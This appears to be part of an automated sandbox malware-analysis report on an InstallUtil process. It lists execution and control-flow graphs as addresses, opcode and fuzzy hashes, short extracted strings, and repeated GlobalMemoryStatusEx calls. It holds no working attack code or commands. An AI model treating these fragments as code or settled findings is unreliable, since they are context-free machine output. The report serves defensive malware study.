                                                            execution_graph 27662 c00848 27664 c0084e 27662->27664 27663 c0091b 27664->27663 27667 c01343 27664->27667 27672 c01454 27664->27672 27669 c01350 27667->27669 27668 c01448 27668->27664 27669->27668 27671 c01454 4 API calls 27669->27671 27678 c07059 27669->27678 27671->27669 27674 c01356 27672->27674 27675 c0145b 27672->27675 27673 c01448 27673->27664 27674->27673 27676 c07059 4 API calls 27674->27676 27677 c01454 4 API calls 27674->27677 27675->27664 27676->27674 27677->27674 27679 c07063 27678->27679 27680 c07119 27679->27680 27683 5a9d288 27679->27683 27689 5a9d278 27679->27689 27680->27669 27684 5a9d29d 27683->27684 27685 5a9d4b2 27684->27685 27686 5a9d4d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27684->27686 27687 5a9d728 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27684->27687 27688 5a9d4c8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27684->27688 27685->27680 27686->27684 27687->27684 27688->27684 27691 5a9d288 27689->27691 27690 5a9d4b2 27690->27680 27691->27690 27692 5a9d4c8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27691->27692 27693 5a9d4d8 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27691->27693 27694 5a9d728 GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx GlobalMemoryStatusEx 27691->27694 27692->27691 27693->27691 27694->27691
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 719548a4a6635fafd844d915284b5b33455837c15696bb830a859b8c4b98163e
                                                            • Instruction ID: d1c113d2eb6077fcc2c7e7a780034097172e718b78cb332ce94fecb23f82d92d
                                                            • Opcode Fuzzy Hash: 719548a4a6635fafd844d915284b5b33455837c15696bb830a859b8c4b98163e
                                                            • Instruction Fuzzy Hash: 6763E931D10B1A8EDB11EB68C8846A9F7B1FF99300F15C79AE45977161EB70AAC4CF81
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf47be2439a00f27ffc0c40dd91b6a42462aa143be837b91af341aa169ab4822
                                                            • Instruction ID: d1d48c5101a2bd8600a36ed2e65fdb2bed634ed738b4d5076b5ec5c44754c96f
                                                            • Opcode Fuzzy Hash: cf47be2439a00f27ffc0c40dd91b6a42462aa143be837b91af341aa169ab4822
                                                            • Instruction Fuzzy Hash: 06333031D10B198EDB11EF68C8805ADF7B1FF99300F15C79AE459A7261EB70AAC5CB81
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 93202a6d14a5ff2f0dcc8d125134151855f5812b74f349fdf1893e55ebbfa676
                                                            • Instruction ID: 4eafaa2edbbb8fae0a098f6ff719e11e84c139bb9fa09a87c89652274a1b8209
                                                            • Opcode Fuzzy Hash: 93202a6d14a5ff2f0dcc8d125134151855f5812b74f349fdf1893e55ebbfa676
                                                            • Instruction Fuzzy Hash: BE23D731D10B1A8ADB11EF68C8809A9F7B1FF99300F11D79AE45977121EB70AAD5CF81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3338 c03e48-c03eae 3340 c03eb0-c03ebb 3338->3340 3341 c03ef8-c03efa 3338->3341 3340->3341 3342 c03ebd-c03ec9 3340->3342 3343 c03efc-c03f54 3341->3343 3344 c03ecb-c03ed5 3342->3344 3345 c03eec-c03ef6 3342->3345 3352 c03f56-c03f61 3343->3352 3353 c03f9e-c03fa0 3343->3353 3346 c03ed7 3344->3346 3347 c03ed9-c03ee8 3344->3347 3345->3343 3346->3347 3347->3347 3349 c03eea 3347->3349 3349->3345 3352->3353 3354 c03f63-c03f6f 3352->3354 3355 c03fa2-c03fba 3353->3355 3356 c03f71-c03f7b 3354->3356 3357 c03f92-c03f9c 3354->3357 3362 c04004-c04006 3355->3362 3363 c03fbc-c03fc7 3355->3363 3358 c03f7d 3356->3358 3359 c03f7f-c03f8e 3356->3359 3357->3355 3358->3359 3359->3359 3361 c03f90 3359->3361 3361->3357 3364 c04008-c04056 3362->3364 3363->3362 3365 c03fc9-c03fd5 3363->3365 3373 c0405c-c0406a 3364->3373 3366 c03fd7-c03fe1 3365->3366 3367 c03ff8-c04002 3365->3367 3369 c03fe3 3366->3369 3370 c03fe5-c03ff4 3366->3370 3367->3364 3369->3370 3370->3370 3371 c03ff6 3370->3371 3371->3367 3374 c04073-c040d3 3373->3374 3375 c0406c-c04072 3373->3375 3382 c040e3-c040e7 3374->3382 3383 c040d5-c040d9 3374->3383 3375->3374 3385 c040f7-c040fb 3382->3385 3386 c040e9-c040ed 3382->3386 3383->3382 3384 c040db 3383->3384 3384->3382 3388 c0410b-c0410f 3385->3388 3389 c040fd-c04101 3385->3389 3386->3385 3387 c040ef-c040f2 call c00ab8 3386->3387 3387->3385 3390 c04111-c04115 3388->3390 3391 c0411f-c04123 3388->3391 3389->3388 3393 c04103-c04106 call c00ab8 3389->3393 3390->3391 3395 c04117-c0411a call c00ab8 3390->3395 3396 c04133-c04137 3391->3396 3397 c04125-c04129 3391->3397 3393->3388 3395->3391 3400 c04147 3396->3400 3401 c04139-c0413d 3396->3401 3397->3396 3399 c0412b 3397->3399 3399->3396 3403 c04148 3400->3403 3401->3400 3402 c0413f 3401->3402 3402->3400 3403->3403
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \Vl
                                                            • API String ID: 0-682378881
                                                            • Opcode ID: 0981371035621822bd156786c4da1b2d853b08197bcd884a2bd886807e59e74f
                                                            • Instruction ID: e671751e307762bebe849516dda727e74248420e876c062f01d2ff4020ea2c4a
                                                            • Opcode Fuzzy Hash: 0981371035621822bd156786c4da1b2d853b08197bcd884a2bd886807e59e74f
                                                            • Instruction Fuzzy Hash: E79181B0E00249DFDF14CFA9C9857DEBBF2BF88314F248129E515A7294EB749985CB81
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 960f7938ddae2f99395a294219b945f07d661ed4911bab5b9504ec90e2e5c127
                                                            • Instruction ID: 69d8664a7b82c0f8e69c32e00568fa638bcd616a506ae0f539bf1621d2aeebd5
                                                            • Opcode Fuzzy Hash: 960f7938ddae2f99395a294219b945f07d661ed4911bab5b9504ec90e2e5c127
                                                            • Instruction Fuzzy Hash: F4329E35B002058FDB14DF68D584BAEBBB2EF89310F248569E919DB396DB35DD42CB80
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3b3025b5f4c33f7aae3be1c226dbc942e16ebf56774eb9c63e24b222f7166f29
                                                            • Instruction ID: ffab367f7ac942dcb652af6dec8c54a3a75ea41c0a3281d35689f8a3da45e7db
                                                            • Opcode Fuzzy Hash: 3b3025b5f4c33f7aae3be1c226dbc942e16ebf56774eb9c63e24b222f7166f29
                                                            • Instruction Fuzzy Hash: 39B15EB0E00609CFDF18CFA9D9817AEBBF2AF88314F148529D515E7294EB749945CB81

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1790 c047cd-c04864 1793 c04866-c04871 1790->1793 1794 c048ae-c048b0 1790->1794 1793->1794 1795 c04873-c0487f 1793->1795 1796 c048b2-c048ca 1794->1796 1797 c04881-c0488b 1795->1797 1798 c048a2-c048ac 1795->1798 1803 c04914-c04916 1796->1803 1804 c048cc-c048d7 1796->1804 1799 c0488d 1797->1799 1800 c0488f-c0489e 1797->1800 1798->1796 1799->1800 1800->1800 1802 c048a0 1800->1802 1802->1798 1805 c04918-c0492a 1803->1805 1804->1803 1806 c048d9-c048e5 1804->1806 1813 c04931-c0495d 1805->1813 1807 c048e7-c048f1 1806->1807 1808 c04908-c04912 1806->1808 1810 c048f3 1807->1810 1811 c048f5-c04904 1807->1811 1808->1805 1810->1811 1811->1811 1812 c04906 1811->1812 1812->1808 1814 c04963-c04971 1813->1814 1815 c04973-c04979 1814->1815 1816 c0497a-c049d7 1814->1816 1815->1816 1823 c049e7-c049eb 1816->1823 1824 c049d9-c049dd 1816->1824 1826 c049fb-c049ff 1823->1826 1827 c049ed-c049f1 1823->1827 1824->1823 1825 c049df-c049e2 call c00ab8 1824->1825 1825->1823 1830 c04a01-c04a05 1826->1830 1831 c04a0f-c04a13 1826->1831 1827->1826 1829 c049f3-c049f6 call c00ab8 1827->1829 1829->1826 1830->1831 1832 c04a07 1830->1832 1833 c04a23 1831->1833 1834 c04a15-c04a19 1831->1834 1832->1831 1837 c04a24 1833->1837 1834->1833 1836 c04a1b 1834->1836 1836->1833 1837->1837
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \Vl$\Vl
                                                            • API String ID: 0-415357090
                                                            • Opcode ID: 196235544425814624610055b218ee930984aa826b31ea9cd22875dd4d6fe6ef
                                                            • Instruction ID: cce705477f3a111c0843237e2d3bb34e072f91c723fa60ebdcc23c3a0c68d681
                                                            • Opcode Fuzzy Hash: 196235544425814624610055b218ee930984aa826b31ea9cd22875dd4d6fe6ef
                                                            • Instruction Fuzzy Hash: 39715AB0E00259DFDF14CFA9C8817DEBBF6AF88310F148129E515A7294EB749942DF91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1838 c047d8-c04864 1841 c04866-c04871 1838->1841 1842 c048ae-c048b0 1838->1842 1841->1842 1843 c04873-c0487f 1841->1843 1844 c048b2-c048ca 1842->1844 1845 c04881-c0488b 1843->1845 1846 c048a2-c048ac 1843->1846 1851 c04914-c04916 1844->1851 1852 c048cc-c048d7 1844->1852 1847 c0488d 1845->1847 1848 c0488f-c0489e 1845->1848 1846->1844 1847->1848 1848->1848 1850 c048a0 1848->1850 1850->1846 1853 c04918-c0495d 1851->1853 1852->1851 1854 c048d9-c048e5 1852->1854 1862 c04963-c04971 1853->1862 1855 c048e7-c048f1 1854->1855 1856 c04908-c04912 1854->1856 1858 c048f3 1855->1858 1859 c048f5-c04904 1855->1859 1856->1853 1858->1859 1859->1859 1860 c04906 1859->1860 1860->1856 1863 c04973-c04979 1862->1863 1864 c0497a-c049d7 1862->1864 1863->1864 1871 c049e7-c049eb 1864->1871 1872 c049d9-c049dd 1864->1872 1874 c049fb-c049ff 1871->1874 1875 c049ed-c049f1 1871->1875 1872->1871 1873 c049df-c049e2 call c00ab8 1872->1873 1873->1871 1878 c04a01-c04a05 1874->1878 1879 c04a0f-c04a13 1874->1879 1875->1874 1877 c049f3-c049f6 call c00ab8 1875->1877 1877->1874 1878->1879 1880 c04a07 1878->1880 1881 c04a23 1879->1881 1882 c04a15-c04a19 1879->1882 1880->1879 1885 c04a24 1881->1885 1882->1881 1884 c04a1b 1882->1884 1884->1881 1885->1885
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \Vl$\Vl
                                                            • API String ID: 0-415357090
                                                            • Opcode ID: 584a70d885682501da7c47b01a29b5397cf7f0e9e9c6cffe561937e6f4f120ce
                                                            • Instruction ID: 00c0c40cb38dcccf8e98107a18e19c4deddb0c535d5e904d52d412ac803e092c
                                                            • Opcode Fuzzy Hash: 584a70d885682501da7c47b01a29b5397cf7f0e9e9c6cffe561937e6f4f120ce
                                                            • Instruction Fuzzy Hash: F5716BB0E00249DFDF18CFA9C88179EBBF6BF88310F148129E515A7294EB749942DF91

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 1953 c06e9f-c06f0a call c06c08 1962 c06f26-c06f55 1953->1962 1963 c06f0c-c06f25 call c06344 1953->1963 1968 c06f57-c06f5a 1962->1968 1970 c06f5c-c06f70 1968->1970 1971 c06f8d-c06f90 1968->1971 1979 c06f72-c06f74 1970->1979 1980 c06f76 1970->1980 1972 c06f92-c06f99 1971->1972 1973 c06fa4-c06fa7 1971->1973 1975 c07168-c0716f 1972->1975 1976 c06f9f 1972->1976 1977 c06fe3-c06fe6 1973->1977 1978 c06fa9-c06fde 1973->1978 1976->1973 1981 c06ff6-c06ff8 1977->1981 1982 c06fe8 call c07988 1977->1982 1978->1977 1983 c06f79-c06f88 1979->1983 1980->1983 1984 c06ffa 1981->1984 1985 c06fff-c07002 1981->1985 1986 c06fee-c06ff1 1982->1986 1983->1971 1984->1985 1985->1968 1987 c07008-c07017 1985->1987 1986->1981 1990 c07041-c07057 1987->1990 1991 c07019-c0701c 1987->1991 1990->1975 1993 c07024-c0703f 1991->1993 1993->1990 1993->1991
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LReq$LReq
                                                            • API String ID: 0-1701832695
                                                            • Opcode ID: f7b95cd69a3de4ed2bd6149bf0329aa19786df9018a3e40e799ab9bb705f9519
                                                            • Instruction ID: ef9111986d239f9673ab51f50e252c8a4dffc6ce03d3c8eff72ca36d14f97785
                                                            • Opcode Fuzzy Hash: f7b95cd69a3de4ed2bd6149bf0329aa19786df9018a3e40e799ab9bb705f9519
                                                            • Instruction Fuzzy Hash: 7251B130E042198FDB14DFA9D45579EBBB5EF85300F21842AE415EB291EB75ED46CB80

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3305 5a9e098-5a9e0a3 3306 5a9e0cd-5a9e0e0 3305->3306 3307 5a9e0a5-5a9e0cc call 5a9d23c 3305->3307 3311 5a9e0e3-5a9e0ec call 5a9d248 3306->3311 3314 5a9e0ee-5a9e0f1 3311->3314 3315 5a9e0f2-5a9e130 3311->3315 3315->3311 3320 5a9e132-5a9e151 3315->3320 3322 5a9e153-5a9e156 3320->3322 3323 5a9e157-5a9e1e4 GlobalMemoryStatusEx 3320->3323 3327 5a9e1ed-5a9e215 3323->3327 3328 5a9e1e6-5a9e1ec 3323->3328 3328->3327
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3294367754.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_5a90000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b724ad8da440ee405723f82f40a24ced6d912844c2f0fe96531eb22f60a7a8bd
                                                            • Instruction ID: 7d124538b3849c3495d3f863f4b162b73d99240060a28a9b44e05c0f01310087
                                                            • Opcode Fuzzy Hash: b724ad8da440ee405723f82f40a24ced6d912844c2f0fe96531eb22f60a7a8bd
                                                            • Instruction Fuzzy Hash: 81412672D043698BCB04DF69D844BAEBBF5AF89210F14856AD414A7341DB789885CBD0

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 3331 5a9d248-5a9e1e4 GlobalMemoryStatusEx 3334 5a9e1ed-5a9e215 3331->3334 3335 5a9e1e6-5a9e1ec 3331->3335 3335->3334
                                                            APIs
                                                            • GlobalMemoryStatusEx.KERNELBASE(?,?,?,?,?,?,?,?,?,05A9E0EA), ref: 05A9E1D7
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3294367754.0000000005A90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A90000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_5a90000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID: GlobalMemoryStatus
                                                            • String ID:
                                                            • API String ID: 1890195054-0
                                                            • Opcode ID: 2a232d82cb8cfec3d6274be18c9ff2640e3a3b0670b8377071562a7e5e219e80
                                                            • Instruction ID: a86b1f92419feea8684fe8e9b6616a78febde47919d813a811903d60bea05829
                                                            • Opcode Fuzzy Hash: 2a232d82cb8cfec3d6274be18c9ff2640e3a3b0670b8377071562a7e5e219e80
                                                            • Instruction Fuzzy Hash: A11106B1C046699BCB14DF9AC844B9EFBF8EB48310F14816AE814A7241D779A944CFA5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: \Vl
                                                            • API String ID: 0-682378881
                                                            • Opcode ID: 368a7ba1f32f1289d10f5b5153e7d42f37e1d7ed683e58adca7fbe39e0c94a1f
                                                            • Instruction ID: 34bcb240e6008187332cc26d4ba0c9096441bba083c8407e2e84c5657d1ceb64
                                                            • Opcode Fuzzy Hash: 368a7ba1f32f1289d10f5b5153e7d42f37e1d7ed683e58adca7fbe39e0c94a1f
                                                            • Instruction Fuzzy Hash: 059171B0E00249DFDF14CFA9C9857DEBBF2BF48314F248129E915A7294DB749986CB81
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PHeq
                                                            • API String ID: 0-2873676430
                                                            • Opcode ID: 6cfc26043b59291815c4b90354f519613de81287a9991b60c55ad7b79c78851c
                                                            • Instruction ID: 5732756ff67db772b665c6a653ddbf81bdc9b7c9790ddaac3f160d484bfce1b8
                                                            • Opcode Fuzzy Hash: 6cfc26043b59291815c4b90354f519613de81287a9991b60c55ad7b79c78851c
                                                            • Instruction Fuzzy Hash: B131E070B002058FDB25AB34D95466F3BA2AB89310F24457CD406DB799EE39CD87CB90
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PHeq
                                                            • API String ID: 0-2873676430
                                                            • Opcode ID: 29c8a458646cc5b88177f63d8fdbe983d4d2e3c75a358b7fd9b5639f1ed27a50
                                                            • Instruction ID: b263ad9a0086ac0ee8c4bffae5a8291591c045fa12411321da87edba63950296
                                                            • Opcode Fuzzy Hash: 29c8a458646cc5b88177f63d8fdbe983d4d2e3c75a358b7fd9b5639f1ed27a50
                                                            • Instruction Fuzzy Hash: 3A31CD30B002058BCB25AF34D95466F7BA3AB85340B24847CD406DB399EE39DD86CBD5
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LReq
                                                            • API String ID: 0-2687900687
                                                            • Opcode ID: 5322a8ad1cf63e56761306b6d357d21161a8ecbe9f1a7bbc0f13004c0dbe6f81
                                                            • Instruction ID: c4e80108f4e6fe696958488e8ae981a221b9caeb6fdc01a058bf320696612a75
                                                            • Opcode Fuzzy Hash: 5322a8ad1cf63e56761306b6d357d21161a8ecbe9f1a7bbc0f13004c0dbe6f81
                                                            • Instruction Fuzzy Hash: A3317070E1020ACBDB24CFA5D54479EB7B5FF95310F21852AE415EB280E7B5ED55CB40
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: LReq
                                                            • API String ID: 0-2687900687
                                                            • Opcode ID: 9827f2c35930438ee60a5140ad8b1a8ea80ebd4b7a85d80e34c24f883c41e1d6
                                                            • Instruction ID: 51fd549df4f2b5261bc7ba2338f986f423ed2cb56067341beb3038120f7fe215
                                                            • Opcode Fuzzy Hash: 9827f2c35930438ee60a5140ad8b1a8ea80ebd4b7a85d80e34c24f883c41e1d6
                                                            • Instruction Fuzzy Hash: DF2102303041448FCB26BF3CD41A7EE7BB2EF86710F1048AAD549CB296EA358D56C781
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9850f2a65ac4c6a35a279a7e2c3ac1ac36f182025645c2baefc103fa2048fe80
                                                            • Instruction ID: 01cb7c7139cadd8b8bab458d8d05d9568305cea05e4fbf3016e93db64f728440
                                                            • Opcode Fuzzy Hash: 9850f2a65ac4c6a35a279a7e2c3ac1ac36f182025645c2baefc103fa2048fe80
                                                            • Instruction Fuzzy Hash: DD127E70B002018BCB19BB2CE45462D77A3EB85710F618E29E415CB7A5DF39ED4BDB90
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d4bd83153434b35d13fa407c04869da50496226129ecc5a56194eb1f79ed1b79
                                                            • Instruction ID: eaf35dd90aec2825a7d25bbb637d01c2655d3e59a4069c83d79997697d714408
                                                            • Opcode Fuzzy Hash: d4bd83153434b35d13fa407c04869da50496226129ecc5a56194eb1f79ed1b79
                                                            • Instruction Fuzzy Hash: 1EB16DB0E00609CFDF14CFA9D98179EBBF2BF88314F148529D925E7294EB749985CB81
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e90320abf6c7a44a4a9f571fbd37ff8eca74631aa35f50b1f05fcf51674f4ece
                                                            • Instruction ID: d847f673cd4a7f105f957d23044fb1c2c013fd046693d195e1d0becd35f54ecd
                                                            • Opcode Fuzzy Hash: e90320abf6c7a44a4a9f571fbd37ff8eca74631aa35f50b1f05fcf51674f4ece
                                                            • Instruction Fuzzy Hash: 0D914E35A101048FCB15DFA8D584BADBBF2EF98310F248569E906E73A6DB35ED42CB50
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fe80268439d7c27515030050d22566024a64c4fe90f57f53939fb910ff19c596
                                                            • Instruction ID: 156734b808585e7215a90ce87e7583e538a6b0c48baf30b32658278b3e8ad90b
                                                            • Opcode Fuzzy Hash: fe80268439d7c27515030050d22566024a64c4fe90f57f53939fb910ff19c596
                                                            • Instruction Fuzzy Hash: B95122B4E003188FDB14CFA9C884B9DBBB1FF48310F14812AE825AB3A5D7749945CB94
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9c534d69ec0b9dd8adc5cf498f06c92018ec483a69c8ec3a7222c80dc736227b
                                                            • Instruction ID: 6c5920799591d1b90e7dee724487b96c900c2dc6285c8d0c0b94ab62357b1272
                                                            • Opcode Fuzzy Hash: 9c534d69ec0b9dd8adc5cf498f06c92018ec483a69c8ec3a7222c80dc736227b
                                                            • Instruction Fuzzy Hash: 625123B4E003188FDB14CFA9C884B9DBBB1FF48310F14812AE825AB395D774A944CF95
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1bd0734b2879c90e6a5233989e37938e63bd6562ba2d22121fd891f90ee5effe
                                                            • Instruction ID: 2eb57507bd9eafad658e1099978579c96ae48e50beda9917a1fc4f40118855d0
                                                            • Opcode Fuzzy Hash: 1bd0734b2879c90e6a5233989e37938e63bd6562ba2d22121fd891f90ee5effe
                                                            • Instruction Fuzzy Hash: A341F131B00204CFDB14EB78D455AAEB7F2EB49314F284569D906E73E5EB358E02CBA0
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e7955723437c2b8909d525d13fc2f5d36b0f52fc1ef35944558d6d55128d48dc
                                                            • Instruction ID: 727844f516ea303932a19d91cb739e7ede9fa4a28adbb71125006a46c46acc23
                                                            • Opcode Fuzzy Hash: e7955723437c2b8909d525d13fc2f5d36b0f52fc1ef35944558d6d55128d48dc
                                                            • Instruction Fuzzy Hash: 0B410C742012468FC786FB28FD90D5A3B65FB52304B448A69E0105B27AFA706D4FEBB4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_c00000_InstallUtil.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5ecc36d34bdfb630574ef9eb2b067d4b543f96d3d99a7ed7a9a68c2572fbc836
                                                            • Instruction ID: 92695bd70bdb12303c3370f57ad6e105628ba26461f219a8749beae36fd8a6e8
                                                            • Opcode Fuzzy Hash: 5ecc36d34bdfb630574ef9eb2b067d4b543f96d3d99a7ed7a9a68c2572fbc836
                                                            • Instruction Fuzzy Hash: 5841ED742112468FC786FB28FD90D4A3B65FB52304B408A69E0145B27AFA707D4FEBB4
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.3285562718.0000000000C00000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C00000, based on PE: false
